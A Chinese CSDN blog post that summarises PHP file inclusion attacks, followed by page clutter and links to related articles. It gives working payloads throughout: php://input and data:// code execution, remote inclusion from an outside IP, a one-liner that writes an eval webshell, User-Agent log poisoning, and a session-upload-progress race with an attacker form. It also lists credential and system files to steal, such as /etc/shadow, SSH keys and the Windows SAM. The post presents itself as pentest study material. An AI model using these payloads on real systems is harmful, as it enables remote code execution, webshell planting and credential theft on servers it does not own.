文件包含漏洞汇总

最新推荐文章于 2024-09-07 15:36:21 发布
最新推荐文章于 2024-09-07 15:36:21 发布
阅读量850 收藏 26
点赞数 28
分类专栏: 网络空间安全 文章标签: 安全 web安全 安全性测试 可信计算技术 系统安全 安全威胁分析 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/140803960
版权

文章目录

原理

程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为文件包含。在包含文件的过程中,如果文件能进行控制,则存储文件包含漏洞

文件包含函数

  • 白盒

    • php:include,require,include_once,require_once,file_put_contents

      • include函数在包含的过程中如果出现错误,就会抛出一个警告,程序继续运行
      • require函数出现错误的时候,会直接报错并退出程序的执行
      • file_put_contents(a,b)将b覆盖a

    • java:java.io.file,java.io.filereader等

    • asp .net: system.io.filestream, system.io.streamreader等

  • 黑盒

    • url中有path,dir,file,pag,page,asrchive,p,eng等相关字眼

伪协议函数

本地包含

  1. file协议

    1. payload:
      ?file=user.txt

  2. filter协议

    1. payload:

      http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=user.txt

  3. input协议

    1. payload

      get:http://127.0.0.1/include.php?file=php://input //如果file过滤php,可以写Php
poet:<?php phpinfo();?>
木马写入:<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd])?>')?>

  4. data协议

    1. payload

      http://127.0.0.1/include.php?file=data://text/plain,<?php phpinfo();?>

    2. payload

      http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
//base64后面的符号要url编码1

远程文件包含

  1. 条件

  2. http协议

    1. payload:

      http://127.0.0.1/include.php?file=http://43.139.186.80/1.txt

日志文件绕过

  1. 概念

    1. 我们访问每一个网站都会有日志留在服务器,这些日志消息通常会包含usergent头,这样我们就可以通过对usergent头传入恶意数据然后通过文件包含漏洞进行解析即可绕过

  2. 日志路径

    1. apache: /var/log/apache/access.log
    2. nginx: /var/log/nginx/access.log 和 /var/log/nginx/error.log

  3. 复现

    1. 随便访问,捉包,在usergent后面插入木马

      1.   <?php eval($_REQUEST['cmd']);?>

    2. 通过文件包含包含日志文件即可,?file=/var/log/nginx/access.log

文件包含之条件竞争

  1. 概念

    1. 通常一个session建立是会被session锁定机制进行锁住,防止多个并发请求同时修改session数据,这个漏洞的原理是利用了PHP_SESSION_UPLOAD_PROGRESS 特性,当 PHP 处理文件上传请求时,会短暂解锁会话文件,允许并发请求访问,攻击者利用这个窗口,发送包含恶意 PHP_SESSION_UPLOAD_PROGRESS 字段的请求来达到任意命令执行的目的

  2. 靶场介绍

    1. 网站

      网站:http://43.139.186.80/1.php
<?php
if (isset($_GET['file'])) {
    $file = $_GET['file'];
//    $file = str_replace("php", "???", $file); 
    $file = str_replace("data", "???", $file); 
//    $file = str_replace(":", "???", $file); 
    $file = str_replace(".", "???", $file); 
    include($file);
} else {
    highlight_file(__FILE__);
}
?>
攻击者的网站:
<!DOCTYPE html>
<html>12
<body>
<form action="http://43.139.186.80/1.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd])?>')?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
//记得form表单更换为上面的为受害者网站,value值为执行函数,目的是在当前网站下创建一个新的木马shell.php

  3. 复现

    1. 攻击者在自己的网站中上传任意文件,捉包,放到攻击者模块

    2. 在数据包中添加cookie和session字段

    3. 攻击模块配置如下

    4. 在进行访问缓存文件的数据包,http://43.139.186.80/1.php?file=C:\phpstudy_pro\Extensions\tmp\tmp\sess_exp,路径可以在phpinfo中的session.save_path值中找到,名称是sess_+你刚才写的名称,捉包,攻击模块配置和上面一样

    5. 同时发包,看返回的数据长度,出现数值不同说明攻击成功

文件下载

  • 文件下载常见的目录
    • 系统目录
      • linux
        • /etc/passwd
        //保存了系统中所有的用户信息

/etc/shadow
        //用户的密码信息

/root/.ssh/authorized_keys
        //公钥文件

/root/.bash_history
        //用户终端操作历史记录

/usr/local/app/apache2/conf/httpd.conf
        //apache2默认配置文件

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf
        //虚拟网站设置

/usr/local/app/php5/lib/php.ini
        //php相关设置

/etc/httpd/conf/httpd.conf
        //apache

/etc/php5/apache2/php.ini
        //ubuntu系统的默认路径
      • windows
        • C:\boot.ini
        //查看系统版本

C:\windows\system32\inetsrv\MetaBase.xml
        //查看IIS虚拟主机配置文件

C:\windows\repair\sam
        //存储Windows系统初次安装的密码

C:\Program Files\mysql\my.ini
        //mysql配置,记录管理员登陆过的MYSQL用户名和密码

C:\Program Files\mysql\data\mysql\user.MYD
        //mysql.user表中的数据库连接密码

C:\windows\php.ini php.ini
        //php配置文件

C:\Windows\system.in
        //winnt的php配置信息

C:\Windows\win.ini
        //winnt的mysql配置文件

C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
        //存储虚拟主机网站路径和密码

C:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf
        //查看WINDOWS系统apache文件

C:/Resin-3.0.14/conf/resin.conf
        //查看jsp开发的网站resin文件配置信息.

C:\Windows\System32\drivers\etc\hostswinserver
        //配置Telnet信息
    • 程序配置文件
      • apache
        • /etc/httpd/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
      • nginx
        • /etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/usr/local/etc/nginx/nginx.conf
      • redis
        • /etc/redis.conf
  • 目录遍历与目录穿越的区别

    • 目录遍历是指获取所有或单个网站目录结构

      • 在这里插入图片描述

    • 而目录穿越是指在本来的文件中返回到上一级文件夹中

      *在这里插入图片描述

CongSec
关注
  • 28
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
任意文件下载漏洞
L_lemo004的博客
09-22 4509
文章目录任意文件下载0x01 漏洞介绍0x02 漏洞产生原因0x03 漏洞发现Google search一般链接形式包含参数利用方法WEB-INF0x04 漏洞绕过0x05 漏洞利用常见利用文件路径WindowsLinux0x06 漏洞判断0x07 漏洞验证0x08 漏洞防护通用文件下载漏洞修复0x09 文件路径汇总任意文件读取漏洞漏洞产生原因任意文件读取文件读取函数漏洞验证任意文件读取验证 任意文件下载 0x01 漏洞介绍 一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户
html文件上传漏洞,文件上传漏洞(绕过姿势)
weixin_31857829的博客
06-07 1467
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
汇总文件包含漏洞合集详解
weixin_45588247的博客
08-15 662
一、简介:   这里主要是对文件包含漏洞相关文章进行汇总,方便各位看官进行浏览。 二、文件包含漏洞汇总: 【文件包含漏洞】——文件包含漏洞入门 【文件包含漏洞】——文件包含漏洞进阶_PHP伪协议 【文件包含漏洞】——文件包含漏洞进阶_日志文件包含利用 【文件包含漏洞】——文件包含漏洞进阶_文件包含漏洞绕过 【文件包含漏洞】——文件包含漏洞防御 ...
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 1426
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
渗透测试文件包含[汇总]
浪子燕青的博客
02-25 483
title: 文件包含[汇总] copyright: true top: 0 date: 2018-08-08 09:27:45 tags: 文件包含漏洞 categories: 渗透测试 permalink: password: keywords: description: 文件包含漏洞 他沿着墙壁漫步,手指扫过满是灰尘的灶台;打开冰箱,里面只剩下一纸盒过期的酸奶。窗帘很没,是白色的蕾丝纱帘和深青色的绒帘,住在这样屋子里的人当然会很在意窗帘吧?连台电视都没有,于是一个人的时候会常常坐在床上看着夕阳落下吧.
漏洞利用】文件上传漏洞&文件包含漏洞利用
b10d9的博客
12-13 1787
漏洞利用】文件上传漏洞&文件包含漏洞利用一句话木马汇总GitHubPHP一句话静态免杀PHP一句话文件上传绕过图片马制作cmd图片头欺骗后缀名绕过前端js验证双后缀名MIME类型绕过文件包含漏洞(上传成功后的利用)文件包含漏洞相关的函数结合PHP伪协议常见协议利用方式php://data://zip://file://phar:// 一句话木马汇总 GitHub 中国蚁剑项目 PHP一句话 在服务端生成内容为一句话木马的shell.php文件,结合php://input使用。 <?p
文件包含漏洞​​​​​​​汇总
m0_74249600的博客
08-11 1003
本文总结了文件包含漏洞相关进阶知识点,需要读者有文件包含漏洞基础,通过本片文章进行相关内容的巩固和拓展。 本文内容截取自课件,如有版权问题请与我联系
java 文件上传漏洞_文件上传漏洞(绕过姿势)
weixin_33315077的博客
02-16 4618
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
文件解析漏洞汇总
一生无悔惜缘的博客
08-03 1475
解析漏洞正如其名,一般大家常说的是,文件在某种格式下,会被执行为该脚本语言的文件。 文件上传漏洞通常与Web容器的解析漏洞配合利用 常见Web容器有IIS、Nginx、Apache、Tomcat等 好了正文开始汇总了,反正都转载贴的,我自己也忘了在哪里看到的了,就不注明转贴地址了。 IIS 6.0解析漏洞 目录解析:/xx.asp/xx.jpg xx.jpg可替换
文件包含漏洞汇总-黑客/渗透测试/CTF通用
08-09
适用于文件包含漏洞初学者去进一步了解漏洞的利用,总结前人的经验
信息安全-渗透测试-未授权漏洞汇总
08-09
文件包含了未授权漏洞的大汇总,将经典案例总结呈现,适用于渗透测试小白更多地去了解未授权漏洞
文件上传漏洞——文件上传检测汇总
cldimd的博客
03-20 2325
文件上传检测分类 任意上传 前端JS检测 文件扩展名检测 MIME-type检测 文件头检测 文件加载检测 1、任意上传概念: 服务端脚本语言未对上传的文件进行任何限制和过滤,导致恶意用户上传任意文件。 2、前端JS检测。 js验证-源代码 ...
快速失败 (fail-fast) 和安全失败 (fail-safe)
最新发布
Flying_Fish_roe的博客
09-07 355
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 280
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性
【看雪-注册安全分析报告】
09-05 1347
看雪学苑(www.kanxue.com)是一个专注于PC、移动、智能设备安全研究及逆向工程的安全综合服务网站!创建于2000年,历经20多年的发展,看雪网站形成了大量有价值的技术资料,经过看雪团队的共同努力,先后出版过数本技术专著,深受出版社和广大读者好评,社会影响深远,在行业中树立了令人尊敬的专业形象。平台为会员提供安全知识的在线课程教学,同时为企业提供智能设备安全相关产品和服务。
高端控制台使用过程中如何保证用电安全
JiaDeLi_console的博客
09-03 580
因此,在使用过程中,采取有效措施确保用电安全,不仅关乎设备寿命,更直接关系到人身安全及数据安全。同时,增强员工的安全意识,让每个人都成为用电安全的守护者,共同营造一个安全、稳定的工作环境。在高端控制台的使用过程中,可以引入智能监控系统,实时监测电力参数、环境温度等关键指标,一旦发现异常立即报警,为及时处理问题提供有力支持。总之,高端控制台使用过程中的用电安全是一项系统工程,需要从电源布局、设备选型、日常维护、人员培训以及智能监控等多个方面入手,全方位、多角度地确保用电安全,为设备的稳定运行保驾护航。
低代码平台中的统一认证与单点登录(SSO):实现简化与安全的用户管理
CC_longhua的博客
09-04 1281
低代码平台是一种允许用户通过图形化界面而非编写大量代码来构建应用程序的工具。这种平台的优势在于能够大幅度缩短开发周期、降低开发成本,并使得非技术人员也能参与到应用开发中。常见的低代码平台有OutSystems、Mendix、Appian等。统一认证是指通过一个中央系统进行用户身份验证的过程。用户只需在中央认证系统中进行一次身份验证,即可访问多个应用程序或服务。这种方式不仅提升了用户体验,还简化了后台的用户管理。对于有特殊需求的企业,低代码平台通常允许用户通过自定义代码来实现更复杂的认证逻辑。
将AI与情境定位结合以确保品牌安全
微信,抖音等国内主要流量平台打通,企业可以无缝把现有的业务场景接入AI能力
09-04 1273
互动广告局 (IAB) 将品牌安全描述为确保你的广告不会出现在不适当、有害或有争议的内容旁边。这些内容可能会损害品牌形象,并可能削弱目标市场的信任度。品牌适配性更进一步。它不仅确保广告避开有害内容,还确保广告与品牌的身份和价值观一致。此举在于寻找广告的“合适”位置,而不仅仅是“安全”的位置。例如,确保奢侈品牌仅出现在高端生活方式内容旁边。
ThinkPHP5 RCE漏洞详解与Payload汇总
为了防御ThinkPHP框架中的RCE漏洞,开发者和管理员应该及时更新到最新版本以修复已知漏洞,同时确保遵循最佳实践,如限制不必要的文件包含、禁用调试模式、对用户输入进行严格过滤和验证,以及应用防火墙规则来阻止...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值